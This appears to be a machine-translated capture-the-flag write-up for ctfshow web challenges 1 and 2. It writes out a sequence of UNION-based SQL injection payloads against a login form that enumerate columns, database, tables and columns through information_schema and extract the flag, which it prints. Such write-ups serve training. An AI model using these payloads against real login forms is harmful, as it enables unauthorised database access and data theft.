ctfshow web 1-2

ctfshow web 1-3
The first question is the sign in question

When I open the link

Look at the source code ：

Found a comment
base64 decode ：

web2
Open the link ：

It's a login interface , Guess yes sql Inject ：

Try to inject points

With echo , The explanation can sql Inject
Number of blasting injection points ：
admin’ union select 1,2,3#

There are three injection points
Blasting database name ：
admin’ union select 1,database(),3#

The database name is web
Joint query table name ：
admin’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
There are two tables. flag and user
guess flag It's just flag Inside this watch
On Blasting flag This table ：
The joint query ：admin’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘flag’#
Only flag A list of data
Query this column of data ：
admin’ union select 1,flag,3 from flag#
Echo directly flag
ctfshow{ef340bd6-5a61-4adc-a889-469bb6e31482}